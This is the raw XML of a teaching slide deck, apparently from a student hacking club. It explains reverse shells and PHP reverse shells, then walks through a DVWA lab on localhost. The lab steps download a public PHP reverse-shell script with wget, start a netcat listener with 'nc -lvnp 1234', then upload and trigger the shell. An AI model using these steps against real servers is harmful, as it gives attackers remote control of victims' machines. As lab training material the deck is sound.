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4" roundtripDataSignature="AMtx7mhfRaam1Zlih18NP6Vmlio0yxmW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66b3f2498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66b3f2498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" name="Google Shape;189;g166b3f2498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6db78a742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6db78a742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Reverse shells take advantage of vulnerabilities on the target computer to start a shell session that they can use to access the victim's computer. Goal is to connect to the victim's computer remotely &amp; gain full control by upgrading your shells privileges as you go. This is a huge security threat &amp; is often used in penetration tests.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;g16db78a742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db78a742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6db78a742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PHP reverse shells are used in situations where you have upload access to a web-server that is running PHP. They center around you being able to upload your own PHP script &amp; the load the webpage that the script would be associated with using your browser.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It is common for the scripts to open an outbound TCP connection from the web-server from a port specified within the script. The using a listener on your computer you can pick up the outgoing signal &amp; connect to the victim. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;g16db78a742c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6fa82965e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6fa82965e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7" name="Google Shape;217;g16fa82965e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sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616323" y="5606709"/>
            <a:ext cx="10959300" cy="6465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/dmuhackers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 b="0" l="12814" r="24059" t="0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 b="0" l="14408" r="14398" t="0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166b3f2498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66b3f2498c_1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166b3f2498c_1_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414450" y="1363250"/>
            <a:ext cx="6675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Soar Point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Firebug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Oddbar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66b3f2498c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1388" y="4701450"/>
            <a:ext cx="52292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66b3f2498c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5875" y="143350"/>
            <a:ext cx="2470325" cy="24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66b3f2498c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41175" y="733150"/>
            <a:ext cx="2797151" cy="279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16db78a742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6db78a742c_0_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Shells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4" name="Google Shape;204;g16db78a742c_0_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536600" y="1690750"/>
            <a:ext cx="9118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shells (also known as remote shell or connect-back shell) uses vulnerabilities located on the target system to start a shell that allows you to access the victim's computer.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is a method commonly used in penetration tests to get a complete takeover of the target machine.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6db78a742c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6db78a742c_0_13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PHP Reverse Shells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2" name="Google Shape;212;g16db78a742c_0_13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536600" y="1690750"/>
            <a:ext cx="9118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PHP Reverse shells specifically are a common exploit in web apps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center around being able to upload or inject your own php file into a web server and then access the upload location, causing it to run.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can be used to execute many server side commands, but one of the most powerful is a shell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16db78a742c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" y="5233950"/>
            <a:ext cx="38481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16fa82965e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6fa82965e0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1" name="Google Shape;221;g16fa82965e0_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475225" y="1812750"/>
            <a:ext cx="52500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sudo dvwa-start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with admin/password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Scroll down and click create/reset database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admin/password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DVWA security tab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 security to low click submit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on file upload tab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a terminal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 wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php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16fa82965e0_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5994325" y="1812750"/>
            <a:ext cx="4966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 nc -lvnp 1234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back to DVWA (firefox) and click browse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and select “php-reverse-shell.php”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upload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Navigate to 127.0.0.1:42001/hackable/uploads/php-reverse-shell.php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Reopen terminal and have fun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2018-05-13T11:45:40Z</dcterms:created>
</cp:coreProperties>
</file>